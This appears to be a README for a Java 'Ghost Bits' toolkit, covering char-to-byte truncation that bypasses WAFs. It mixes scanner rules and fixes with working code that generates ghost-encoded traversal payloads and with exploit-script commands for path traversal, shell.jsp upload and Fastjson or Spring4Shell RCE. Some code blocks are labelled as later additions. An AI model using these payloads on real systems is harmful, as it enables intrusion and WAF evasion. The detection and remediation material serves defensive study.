## https://sploitus.com/exploit?id=78CF8AD6-3E6A-58B5-B3C4-2D259401D82F
# Ghost Bits Toolkit

Java Ghost Bits vulnerability detection and exploitation toolset.

## Vulnerability Background

Ghost Bits is a vulnerability class in the Java ecosystem disclosed at Black Hat Asia 2026. It stems from the behaviour of the narrowing cast from `char` (16-bit) to `byte` (8-bit) in Java: the cast keeps only the low 8 bits of the character and silently drops the rest.

**Core impact**: security controls (WAF/IDS) and the application itself parse the same input with different semantics. The control inspects what look like harmless Unicode characters, while the backend's char-to-byte conversion collapses them back into the dangerous ASCII attack payload.

**Affected scope**: mainstream Java frameworks and middleware such as Tomcat, Jetty, Spring, Fastjson, Jackson, Openfire, BCEL and Apache HttpClient.

## Core Principle

```
char (16-bit UTF-16 code unit) → (byte) narrowing cast → byte (8-bit)
  upper 8 bits are silently discarded
  lower 8 bits  = the dangerous ASCII character
```

Example: `陪` (U+966A) → `(byte)` cast → `0x6A` → `'j'`

Attackers replace key ASCII characters in an attack payload with Ghost Bits characters. The WAF sees harmless Chinese characters; the backend Java service converts them back into the original attack payload.

## Tool Components
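To make the cast concrete, here is an added Python model (not part of the toolkit) of what a `(byte) ch` loop in Java reconstructs from a string, set against a toy WAF that matches on the Unicode text. The WAF rules, the U+962E / U+4E2F substitutions and the traversal path are this example's own constructions:

```python
import re

# Java stores strings as UTF-16 code units; (byte) ch keeps only the low 8 bits
# of each unit. Encoding to UTF-16-LE and taking every even byte models that
# exactly, including the surrogate pairs that non-BMP characters become.
def java_byte_truncate(s: str) -> bytes:
    """Model of `for (char ch : s.toCharArray()) out.write((byte) ch)`."""
    return s.encode("utf-16-le")[0::2]


def java_byte_cast(ch: str) -> int:
    """Model of Java `(byte) ch` for one BMP char: signed result, -128..127."""
    if len(ch) != 1 or ord(ch) > 0xFFFF:
        raise ValueError("one UTF-16 code unit expected")
    low = ord(ch) & 0xFF
    return low - 256 if low > 0x7F else low


# Toy WAF that inspects the request as text, the way a rule engine matching on
# decoded Unicode does (constructed rules for this example, not a real product).
WAF_RULES = [
    re.compile(r"\.\./"),                          # path traversal
    re.compile(r"(?i)class\.module\.classLoader"),  # Spring4Shell keyword
    re.compile(r"\r|\n"),                          # CRLF injection
]


def waf_blocks(request: str) -> bool:
    return any(rule.search(request) for rule in WAF_RULES)


# Substitutions from the mapping table: '.' -> U+962E 阮, '/' -> U+4E2F 丯.
# Only the low byte matters: 0x962E & 0xFF == 0x2E == '.'
GHOST_DOT = "\u962e"
GHOST_SLASH = "\u4e2f"
GHOST_TRAVERSAL = (GHOST_DOT * 2 + GHOST_SLASH) * 3 + "etc/passwd"   # constructed
PLAIN_TRAVERSAL = "../../../etc/passwd"


def demo() -> dict:
    """What the WAF sees versus what a (byte)-casting backend reconstructs."""
    return {
        "waf_blocks_plain": waf_blocks(PLAIN_TRAVERSAL),
        "waf_blocks_ghost": waf_blocks(GHOST_TRAVERSAL),
        "backend_sees": java_byte_truncate(GHOST_TRAVERSAL),
        "pei_as_byte": java_byte_cast("\u966a"),   # 陪 -> 0x6A -> 'j'
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The WAF rule for `../` never fires on the ghost string because no ASCII `.` or `/` is present, yet `java_byte_truncate` returns exactly `../../../etc/passwd`. Note also that `java_byte_cast` goes negative for low bytes above 0x7F, which is why `ch & 0xFF` shows up as an equivalent pattern in the detection rules below.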

### 1. Detection Script (ghost_bits_scanner.py)

Scan Java source code for Ghost Bits vulnerabilities:

```
# Scan a directory
python src/ghost_bits_scanner.py ./src

# Scan specific file types
python src/ghost_bits_scanner.py ./project --ext .java,.jsp

# JSON output
python src/ghost_bits_scanner.py ./src --json

# List all detection rules
python src/ghost_bits_scanner.py /dev/null --rules
```

**Detection Rules (10)**:

| Rule ID | Severity | Detection Content |
|---------|----------|------------------|
| GB-001 | HIGH | `(byte)` cast applied to a `char` |
| GB-002 | HIGH | `& 0xFF` / `& 255` bitwise truncation |
| GB-003 | MEDIUM | `OutputStream.write(int)` |
| GB-004 | HIGH | `DataOutputStream.writeBytes()` |
| GB-005 | HIGH | Deprecated `String.getBytes(int,...)` |
| GB-006 | MEDIUM | `URLDecoder.decode()` relaxed decoding |
| GB-007 | MEDIUM | `Character.digit()` relaxed conversion |
| GB-008 | HIGH | `RandomAccessFile.writeBytes()` |
| GB-009 | HIGH | `StringBufferInputStream` |
| GB-010 | LOW | Custom Hex decoding |
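The detection logic behind such a rule table, as an added example written for this page rather than the toolkit's own `ghost_bits_scanner.py`: the rule IDs follow the table above, but the regexes, severities and the sample Java source are this example's own approximations. Source-level regexes cannot see types, so each hit still needs a human to confirm the operand is a `char` derived from untrusted input.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    rule_id: str
    severity: str
    pattern: re.Pattern
    description: str


# Regex approximations of the rule table (written for this example).
RULES = [
    Rule("GB-001", "HIGH", re.compile(r"\(\s*byte\s*\)\s*[A-Za-z_(]"),
         "(byte) cast applied to an expression: drops the high 8 bits of a char"),
    Rule("GB-002", "HIGH", re.compile(r"&\s*(?:0x[fF]{2}|255)\b"),
         "& 0xFF / & 255 truncation"),
    Rule("GB-003", "MEDIUM", re.compile(r"\.write\(\s*[A-Za-z_]\w*\s*\)"),
         "OutputStream.write(int) with a bare variable: only the low byte is written"),
    Rule("GB-004", "HIGH", re.compile(r"\.writeBytes\("),
         "DataOutputStream/RandomAccessFile.writeBytes(String) (also covers GB-008)"),
    Rule("GB-005", "HIGH", re.compile(r"\.getBytes\(\s*\d"),
         "deprecated String.getBytes(int srcBegin, int srcEnd, byte[] dst, int dstBegin)"),
    Rule("GB-006", "MEDIUM", re.compile(r"URLDecoder\.decode\("),
         "URLDecoder.decode() relaxed decoding"),
    Rule("GB-007", "MEDIUM", re.compile(r"Character\.digit\("),
         "Character.digit() accepts non-ASCII digits"),
    Rule("GB-009", "HIGH", re.compile(r"\bStringBufferInputStream\b"),
         "StringBufferInputStream truncates each char to a byte"),
]


def scan_source(source: str) -> list:
    """Return (rule_id, severity, line_no, line) for every rule hit, in file order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        code = line.split("//", 1)[0]   # naive: ignores trailing line comments
        for rule in RULES:
            if rule.pattern.search(code):
                findings.append((rule.rule_id, rule.severity, lineno, line.strip()))
    return findings


# Constructed sample: one vulnerable loop, one write() loop, one writeBytes(),
# and one correct conversion with an explicit charset that must not be flagged.
SAMPLE_JAVA = r"""public class Demo {
    static byte[] toBytes(String s) {
        byte[] out = new byte[s.length()];
        for (int i = 0; i < s.length(); i++) {
            char ch = s.charAt(i);
            out[i] = (byte) ch;
        }
        return out;
    }
    static void copy(String s, ByteArrayOutputStream baos) {
        for (char ch : s.toCharArray()) {
            baos.write(ch);
            baos.write(ch & 0xFF);
        }
    }
    static void send(DataOutputStream dos, String line) throws IOException {
        dos.writeBytes(line + "\r\n");
    }
    static byte[] safe(String s) {
        return s.getBytes(StandardCharsets.UTF_8);
    }
}
"""

if __name__ == "__main__":
    for rule_id, severity, lineno, text in scan_source(SAMPLE_JAVA):
        print(f"{rule_id} [{severity}] line {lineno}: {text}")
```

On the sample this reports GB-001 on the `(byte) ch` assignment, GB-003 and GB-002 on the two `baos.write(...)` calls, and GB-004 on `writeBytes`, while the `getBytes(StandardCharsets.UTF_8)` line stays clean. The comment stripping is deliberately naive (a `//` inside a string literal would truncate the line), which is acceptable for triage but not for a production scanner.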

### 2. Exploitation Script (ghost_bits_exploit.py)

Generate Ghost Bits bypass payloads, supporting 7 attack scenarios:

```
# Path traversal (Spring CVE-2025-41242)
python src/ghost_bits_exploit.py -s path-traversal -t /etc/passwd

# File upload bypass
python src/ghost_bits_exploit.py -s file-upload -f shell.jsp

# CRLF injection
python src/ghost_bits_exploit.py -s crlf-inject

# Fastjson deserialization
python src/ghost_bits_exploit.py -s fastjson-rce --cmd "whoami"

# Spring4Shell class keyword bypass
python src/ghost_bits_exploit.py -s spring4shell

# BCEL deserialization bypass
python src/ghost_bits_exploit.py -s bcel-rce

# Custom payload
python src/ghost_bits_exploit.py -s custom -p "class.module.classLoader"

# Use a different Ghost Bits variant
python src/ghost_bits_exploit.py -s path-traversal -v 1
```

## Typical Ghost Bits Mapping

| Target ASCII | Hex | Ghost Bits character | Code point |
|-------------|-----|----------------------|------------|
| `.` | 0x2E | 阮 | U+962E |
| `/` | 0x2F | 丯 | U+4E2F |
| `%` | 0x25 | 严 | U+4E25 |
| `j` | 0x6A | 陪 | U+966A |
| `s` | 0x73 | 乳 | U+4E73 |
| `p` | 0x70 | 买 | U+4E70 |
| `@` | 0x40 | 乀 | U+4E40 |
| `\r` | 0x0D | 瘍 | U+760D |
| `\n` | 0x0A | 瘊 | U+760A |

**WAF bypass statistics**: within the CJK Unified Ideographs block alone (U+4E00 to U+9FFF), every ASCII character has 82 Ghost Bits alternatives, one for each high byte from 0x4E to 0x9F. For `../` that gives 82 × 82 × 82 = **551,368** combinations; a WAF that blacklists individual lookalike characters cannot enumerate them all.

## Suggestions for Fixing

1. **Remove dangerous code patterns**: audit and remove `(byte) ch`, `ch & 0xFF`, `baos.write(ch)` and similar char-to-byte truncations.
2. **Use an explicit encoding**: pass a `Charset` (for example UTF-8) whenever converting strings to bytes.
3. **Input normalization**: apply a character whitelist to high-risk fields.
4. **Reject abnormal characters**: explicitly reject invisible control characters and obfuscation characters that have no business in the field.
5. **WAF upgrade**: deploy WAF rules that are Unicode-aware instead of matching on ASCII literals alone.
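Putting the mapping arithmetic and the fixes together: an added Python example (not the toolkit's code) that enumerates the 82 alternatives per byte described in the mapping section, builds a traversal variant, shows what a Java `(byte)` loop recovers from it, and then applies suggestions 2 to 4 so that the same variant is rejected before any byte conversion happens. The whitelist, the "path field" and the sample payload are this example's assumptions.

```python
import re

CJK_START, CJK_END = 0x4E00, 0x9FFF   # CJK Unified Ideographs block


def ghost_alternatives(ch: str) -> list:
    """All ideographs in the block whose low byte equals ord(ch): 82 per ASCII char."""
    low = ord(ch)
    if low > 0xFF:
        raise ValueError("target must be a single-byte character")
    highs = range(CJK_START >> 8, (CJK_END >> 8) + 1)   # 0x4E .. 0x9F
    return [chr((high << 8) | low) for high in highs]


def ghost_encode(payload: str, targets: str = "./%@\r\n", variant: int = 0) -> str:
    """Replace each char in `targets` with its variant-th Ghost Bits alternative."""
    out = []
    for ch in payload:
        if ch in targets:
            alts = ghost_alternatives(ch)
            out.append(alts[variant % len(alts)])
        else:
            out.append(ch)
    return "".join(out)


def variant_count(payload: str, targets: str = "./%@\r\n") -> int:
    """Number of distinct ghost encodings of `payload` (82 ** substituted chars)."""
    n = 1
    for ch in payload:
        if ch in targets:
            n *= len(ghost_alternatives(ch))
    return n


def java_truncate(s: str) -> bytes:
    """What a `(byte) ch` loop in Java reconstructs (BMP-only, fine for this block)."""
    return bytes(ord(c) & 0xFF for c in s)


# --- Fix side: suggestions 2 to 4 as code -----------------------------------
def encode_utf8(s: str) -> bytes:
    """Suggestion 2: convert with an explicit charset. 陪 becomes E9 99 AA, never 'j'."""
    return s.encode("utf-8")


# Constructed whitelist for a path-like field: letters, digits, . _ ~ / -
HIGH_RISK_WHITELIST = re.compile(r"^[A-Za-z0-9._~/-]*$")


def validate_path_field(value: str) -> str:
    """Suggestions 3 and 4: reject non-ASCII first, then enforce the whitelist."""
    if not value.isascii():
        raise ValueError("non-ASCII character in path field")
    if not HIGH_RISK_WHITELIST.match(value):      # also excludes control chars
        raise ValueError("character outside whitelist in path field")
    return value


def demo() -> dict:
    ghost = ghost_encode("../", variant=0)        # U+4E2E U+4E2E U+4E2F
    results = {
        "alternatives_per_char": len(ghost_alternatives(".")),
        "variants_of_dotdotslash": variant_count("../"),
        "backend_truncation": java_truncate(ghost),
        "utf8_of_pei": encode_utf8("\u966a").hex(),
    }
    try:
        validate_path_field(ghost)
        results["ghost_accepted"] = True
    except ValueError as exc:
        results["ghost_accepted"] = False
        results["reason"] = str(exc)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The table entry for `.` (U+962E) is simply `ghost_alternatives(".")[0x96 - 0x4E]`; the `-v` flag of the exploit script corresponds to picking a different index. On the fix side, the whitelist rejects every one of the 551,368 variants with a single `isascii()` check, leaving the plain `../` for the application's normal path-traversal filter to see.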

## Affected Components and CVEs

| Component | CVE | Vulnerability Type |
|-----------|-----|------------------|
| Spring + Jetty | CVE-2025-41242 | Path traversal |
| Openfire | CVE-2023-32315 | Authentication bypass |
| Spring | CVE-2022-22965 (Spring4Shell) | RCE |
| GeoServer | CVE-2024-36401 | RCE |
| JDK HttpServer | CVE-2026-21933 | Request smuggling |
| Tomcat | — | File upload |
| Fastjson | — | Deserialization RCE |
| Jackson | — | SQL injection/RCE |
| Apache BCEL | — | Deserialization RCE |
| Apache HttpClient ≤4.5.9 | — | Request smuggling |
| Angus Mail | — | SMTP injection |

## References

- Black Hat Asia 2026: "Cast Attack: A New Threat Posed by Ghost Bits in Java" by Xinyu Bai & Zhihui Chen
- Spring CVE-2025-41242 PoC: https://github.com/vulhub/vulhub/blob/master/spring/CVE-2025-41242/

## License

MIT